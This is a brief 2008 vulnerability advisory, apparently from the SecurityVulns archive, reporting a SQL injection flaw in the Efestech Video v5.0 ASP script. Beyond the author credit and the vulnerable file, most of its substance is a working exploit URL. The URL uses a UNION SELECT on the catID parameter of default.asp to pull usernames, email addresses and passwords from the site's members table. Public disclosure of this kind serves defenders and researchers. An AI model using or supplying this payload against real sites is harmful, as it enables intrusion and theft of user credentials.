Efestech Video v5,0 (id) Remote Sql Injection

2008-04-01T00:00:00
ID SECURITYVULNS:DOC:19543
Type securityvulns
Reporter Securityvulns
Modified 2008-04-01T00:00:00

Description

$Author : RMx $Mail : RM-x@Msn.com $Homepage : Coderx.org $Script name :Efestech video v5.0 $Script download :http://www.aspindir.com/goster/4835 $Script Sales : Free $Thanks : Ex-47 , TR_IP

$Vulnerable file :

Default.asp

$Vulnerable code :

id parameters cannot filter...

$Exploit :

http://www.hedefsite.com/[path]/default.asp?catID=-1%20union%20select%200,kullanici,eposta,3,4,5,sifre,7,8,9,10,11,12,13%20from%20uyeler